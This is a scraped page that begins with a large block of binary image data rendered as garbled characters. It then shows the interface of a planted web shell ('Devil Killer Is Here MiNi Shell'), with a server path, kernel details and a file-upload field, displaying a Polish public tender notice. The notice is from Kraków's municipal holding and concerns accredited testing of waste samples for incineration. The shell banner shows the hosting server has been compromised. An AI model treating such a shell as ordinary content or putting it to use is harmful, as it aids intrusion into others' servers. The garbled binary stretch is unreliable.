JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220111/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220111/0001163701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługi polegające na poborze, przygotowaniu i prowadzeniu akredytowanych badań próbek odpadów kierowanych do termicznego przekształcenia w<br/>Zakładzie Termicznego Przekształcania Odpadów w Krakowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Krakowski Holding Komunalny S. A. w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 351118089</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Jana Brożka</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">30-347</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@khk.krakow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://khk.krakow.pl/pl/bip/ogloszenia-i-przetargi/zamowienia-publiczne/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługi polegające na poborze, przygotowaniu i prowadzeniu akredytowanych badań próbek odpadów kierowanych do termicznego przekształcenia w<br/>Zakładzie Termicznego Przekształcania Odpadów w Krakowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1e71140f-72ca-11ec-83b1-bea871b78b5b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00011637</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-01-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/khk <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/khk</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz<br/>przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, z uwzględnieniem<br/>wyjątków określonych w PZP, odbywa się przy użyciu środków komunikacji elektronicznej.<br/>14.2. Komunikacja ustna dopuszczalna jest w odniesieniu do informacji, które nie są istotne, w<br/>szczególności nie dotyczą ogłoszenia o zamówieniu lub dokumentów zamówienia, potwierdzenia<br/>zainteresowania, ofert, o ile jej treść jest udokumentowana.14.3. Forma dokumentów: określono w pkt.<br/>14.3 SWZ.14.4. Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy<br/>przekazują elektronicznie poprzez: https://platformazakupowa.pl/pn/khk (wyjątkowo na adres mailowy:<br/>przetargi@khk.krakow.pl).UWAGA: niedopuszczalnym jest złożenie oferty w sposób inny niż wskazany<br/>w pkt 18. SWZ.14.5. Platforma, o której mowa w pkt. poprzedzającym:14.5.1. Instrukcja obsługi<br/>platformy, znajduje się pod linkiem: https://platformazakupowa.pl/strona/45-<br/>instrukcje;14.5.2. Komunikacja poprzez ”Wyślij wiadomość” umożliwia dodanie do treści wysyłanej<br/>wiadomościplików lub spakowanego katalogu (załączników). Występuje limit objętości plików lub<br/>spakowanychfolderów do ilości 10 plików lub spakowanych folderów przy maksymalnej sumarycznej<br/>wielkości 150MB.14.6. Każda ze stron na żądanie drugiej, niezwłocznie potwierdza fakt otrzymania<br/>oświadczeń,wniosków, zawiadomień lub informacji.14.7. Osobą uprawnioną do porozumiewania się z<br/>Wykonawcami jest: Ewa Kwiatkowska</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">26.1.1. administratorem Pani/Pana danych osobowych jest<br/>Zamawiający.<br/>26.1.2. Kontakt do inspektora ochrony danych osobowych: iod@khk.krakow.pl, tel.: 12 269 15 05.<br/>26.1.3. Pani/Pana dane osobowe przetwarzane będą w związku z koniecznością wypełnienia<br/>obowiązku prawnego ciążącego na Zamawiającym, w celu związanym z niniejszym postępowaniem o<br/>udzielenie zamówienia publicznego.<br/>26.1.4. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona<br/>zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 PZP oraz odpowiednie<br/>organy kontrole w zakresie ich kompetencji;<br/>26.1.5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Pzp, przez okres 4 lat<br/>od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy. Dane te mogą być przechowywane<br/>przez okres dłuższy niż wskazany, o ile wynika to z ustawy z dnia 14 lipca 1983 r. o narodowym<br/>zasobie archiwalnym i archiwach (t. j. Dz. U. z 2020 r. poz. 164<br/>z późn. zm.) i przepisów wykonawczych do tej ustawy.<br/>26.1.6. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana<br/>dotyczących jest wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem<br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych<br/>wynikają z ustawy PZP;<br/>26.1.7. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany.<br/>26.1.8. posiada Pani/Pan:<br/>26.1.8.1. prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>26.1.8.2. prawo do sprostowania Pani/Pana danych osobowych (Wyjaśnienie: skorzystanie z prawa do<br/>sprostowania nie może skutkować zmianą wyniku postępowania)<br/>26.1.8.3. prawo żądania od administratora ograniczenia przetwarzania danych osobowych (prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego);<br/>26.1.8.4. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna<br/>Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy;<br/>26.1.9. nie przysługuje Pani/Panu:<br/>26.1.9.1. prawo do usunięcia danych osobowych;<br/>26.1.9.2. prawo do przenoszenia danych osobowych;<br/>26.1.9.3. prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną<br/>przetwarzania Pani/Pana danych osobowych jest konieczność wypełnienia obowiązku prawnego<br/>ciążącego na zamawiającym.<br/>26.2. Ponadto Zamawiający informuje, iż:<br/>26.2.1. w przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia<br/>2016/679, wymagałoby niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której<br/>dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w<br/>szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub<br/>konkursu;<br/>26.2.2. wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie<br/>ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie<br/>zamówienia publicznego lub konkursu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">KZP-271-TP-1/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.1.	Przedmiotem zamówienia jest wykonywanie usługi polegającej na poborze odpadów (o kodach: 20 03 01 oraz 19 12 12) zgodnie z normą przenoszącą normę EN 15442:2011 i przygotowaniu próbek zgodnie z normą przenoszącą normę EN 15443:2011 lub procedurze własnej opartej na wzmiankowanej normie przedmiotowej oraz prowadzeniu akredytowanych badań próbek odpadów (o kodach odpadów: 20 03 01 oraz 19 12 12) kierowanych do termicznego przekształcenia w Zakładzie Termicznego Przekształcania Odpadów w Krakowie przy ul. Jerzego Giedroycia 23, przez okres 12 miesięcy, w obszarze regulowanym prawnie - Rozporządzenie Ministra Środowiska z dnia 8 czerwca 2016 r. w sprawie warunków technicznych kwalifikowania części energii odzyskanej z termicznego przekształcenia odpadów zgodnie z normami przenoszącymi normy wyszczególnione w załączniku nr 1 do ww. rozporządzenia, w szczególności:<br/>3.1.1.	PN-EN 15400:2011 Stałe paliwa wtórne - Oznaczanie wartości opałowej;<br/>3.1.2.	PN-EN 15440:2011 Stałe paliwa wtórne - Metody oznaczania zawartości biomasy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79723000-8 - Usługi analizy odpadów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71900000-7 - Usługi laboratoryjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 9.2.	Zamawiający przewiduje skorzystania z opcji, o której mowa w art. 441 PZP.<br/>a) zakres zamówienia objętego opcją: Zamówienie z prawem opcji: wskazana w pkt 3.1 SWZ planowana częstotliwość badań (ilość prób) jest częstotliwością maksymalną – faktyczna ilość badań będzie wynikać z realnych potrzeb Zamawiającego. Zamawiający zastrzega sobie możliwość zmniejszenia zakresu zamówienia do 50% wskazanych maksymalnych ilości prób.<br/>b) okoliczności, w jakich może dojść do skorzystania z opcji: istnienie potrzeby po stronie danego Zamawiającego po realizacji zamówienia podstawowego. <br/>c) warunek uruchomienia prawa opcji: każdy z Zamawiających będzie uprawniony do złożenia w terminie 90 dni od podpisania ostatniego protokołu odbioru usług oświadczenia o skorzystaniu z prawa opcji, wskazującego jednocześnie zakres rozszerzonego zakresu zamówienia. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">cena</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 11.1.4.	spełnia warunki dotyczące zdolności technicznej lub zawodowej, tj.: <br/>11.1.4.1.	posiada wiedzę i doświadczenie niezbędną do realizacji zamówienia tzn.: w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) wykonał/wykonuje:<br/>11.1.4.1.1.	przynajmniej dwie usługi akredytowanego badania próbek odpadów w zakresie wartości opałowej o wartości co najmniej 50 000 zł netto łącznie;<br/>11.1.4.1.2.	przynajmniej dwie usługi akredytowanego badania próbek odpadów w zakresie zawartości frakcji biodegradowalnej o wartości co najmniej 50 000 zł netto łącznie<br/>11.1.4.2.	dysponuje laboratorium posiadającym akredytacje laboratorium badawczego wystawione przez Polskie Centrum Akredytacji lub certyfikaty innego, równoważnego ośrodka akredytacji, potwierdzające spełnianie normy przenoszącej normę EN ISO/IEC 17025:2018-02, w zakresie obejmującym prowadzenie badań odpadów, zgodnie z normami przenoszącymi normy:<br/>•	PN-EN 15400:2011 Stałe paliwa wtórne – oznaczanie wartości opałowej;<br/>•	PN-EN 15440:2011 Stałe paliwa wtórne – metody oznaczania zawartości biomasy;<br/>w obszarze regulowanym prawnie - Rozporządzenie Ministra Środowiska z dnia 8 czerwca 2016 r. w sprawie warunków technicznych kwalifikowania części energii odzyskanej z termicznego przekształcenia odpadów<br/>11.1.4.3.	posiada akredytację (lub dysponuje podmiotem gospodarczym posiadającym akredytację) na pobór odpadów (o kodach: 20 03 01 oraz 19 12 12) zgodnie z normą przenoszącą normę EN 15442:2011 i przygotowaniu próbek zgodnie z normą przenoszącą normę EN 15443:2011 lub procedurze własnej opartej na wzmiankowanej normie przedmiotowej, w obszarze regulowanym prawnie - Rozporządzenie Ministra Środowiska z dnia 8 czerwca 2016 r. w sprawie warunków technicznych kwalifikowania części energii odzyskanej z termicznego przekształcenia odpadów<br/><br/>11.1.4.4.	dysponuje przynajmniej dwiema osobami przeszkolonymi z pobierania prób paliw stałych w zakresie obowiązujących norm technicznych PN i ISO (lub norm równoważnych), co zostało potwierdzone stosownymi certyfikatami/zaświadczeniami <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Aktualne na dzień składania ofert oświadczenie, o którym mowa w art. 125 ust. 1 PZP o niepodleganiu wykluczeniu</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">12.1.1. Dokumenty z których wynika umocowanie do składania oświadczeń woli w imieniu Wykonawcy<br/>(przynajmniej do złożenia oferty) – np. odpis z KRS lub CEIDG (o ile dotyczy). Jeżeli Wykonawca<br/>działa przez pełnomocnika należy dodatkowo załączyć stosowne pełnomocnictwo dla danej osoby.<br/>12.1.2. Wypełniony formularz ofertowy - stanowiący załącznik nr 2 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 13.1. W postępowaniu o udzielenie zamówienia Zamawiający żąda przedmiotowych środków dowodowych na potwierdzenie, że oferowane usługi spełniają określone przez Zamawiającego wymagania, cechy lub kryteria w następującym zakresie:<br/>13.1.1.	certyfikatu wydanego przez jednostkę oceniającą zgodność lub sprawozdania z badań przeprowadzonych przez tę jednostkę na potwierdzenie posiadania akredytacji laboratorium badawczego, udzielonej przez Polskie Centrum Akredytacji (lub inną, równoważną jednostkę) i potwierdzającej spełnianie wymagań normy przenoszącej normę EN ISO/IEC 17025:2018-02<br/>13.1.2.	dokumentu dot. zakresu akredytacji wydanego przez Polskie Centrum Akredytacji (lub inną, równoważną jednostkę) na potwierdzenie zgodności metodyki badawczej z normami wyspecyfikowanymi w warunkach zamówienia i (jeśli dotyczy) zgodności zakresu pomiarowego poszczególnych metod z zakresem określonym w warunkach zamówienia. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 13.1.1. certyfikatu wydanego przez jednostkę oceniającą zgodność lub sprawozdania z badań<br/>przeprowadzonych przez tę jednostkę na potwierdzenie posiadania akredytacji laboratorium<br/>badawczego, udzielonej przez Polskie Centrum Akredytacji (lub inną, równoważną jednostkę) i<br/>potwierdzającej spełnianie wymagań normy przenoszącej normę EN ISO/IEC 17025:2018-02<br/>13.1.2. dokumentu dot. zakresu akredytacji wydanego przez Polskie Centrum Akredytacji (lub<br/>inną, równoważną jednostkę) na potwierdzenie zgodności metodyki badawczej z normami<br/>wyspecyfikowanymi w warunkach zamówienia i (jeśli dotyczy) zgodności zakresu pomiarowego<br/>poszczególnych metod z zakresem określonym w warunkach zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 16.1.	Oferta zawierająca całość przedmiotu zamówienia powinna być zabezpieczona wadium w wysokości: 4 800,00 zł (cztery tysiące osiemset złotych 00/100). <br/>16.2.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 PZP.<br/>16.3.	Wadium wnosi się w następujących formach:<br/>16.3.1.	pieniądzu,<br/>16.3.2.	gwarancjach bankowych,<br/>16.3.3.	gwarancjach ubezpieczeniowych,<br/>16.3.4.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku – o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836, 1572).<br/>16.4.	Uwaga: Wadium wnoszone w formie gwarancji bankowej, gwarancji ubezpieczeniowej, poręczenia bankowego powinno zawierać następujące elementy:<br/>16.4.1.	określenie terminu obowiązywania poręczenia lub gwarancji przez cały okres związania ofertą;<br/>16.4.2.	określenie kwoty poręczenia lub gwarancji;<br/>16.4.3.	wskazanie gwaranta poręczenia lub gwarancji;<br/>16.4.4.	wskazanie beneficjenta poręczenia lub gwarancji;<br/>16.4.5.	zapis, iż poręczyciel / gwarant zobowiązuje się bezwarunkowo tj. na pierwsze żądanie, do zapłaty pełnej <br/>kwoty zabezpieczenia na rzecz beneficjenta,<br/>16.4.6.	nieodwołalność poręczenia lub gwarancji,<br/>16.5.	W przypadku wniesienia wadium w formie pieniężnej należy je wpłacić przelewem na konto Zamawiającego:<br/>Nazwa banku: Santander Bank Polska S.A.<br/>Numer konta 73 1090 2053 0000 0001 4761 7962<br/>(IBAN: PL73109020530000000147617962, SWIFT: WBKPPLPP)<br/>powołując się na nazwę postępowania, nr sprawy oraz podając nazwę banku i numer swojego konta, na które należy zwrócić wadium.<br/>16.6.	Za skuteczne wniesione wadium w pieniądzu, Zamawiający uważa wadium, które w oznaczonym terminie (przed upływem terminu składania ofert lub wniosków) znajdzie się na rachunku bankowym Zamawiającego (decyduje data uznania rachunku Zamawiającego).<br/>16.7.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, Wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>16.8.	Zamawiający dopuszcza złożenie wadium w kilku formach przy jednoczesnym spełnieniu powyższych obowiązków. <br/>16.9.	Zasady zwrotu i zatrzymania wadium określa PZP.<br/>16.10.	Złożenie przez Wykonawcę wniosku o zwrot wadium, o którym mowa w art. 98 ust. 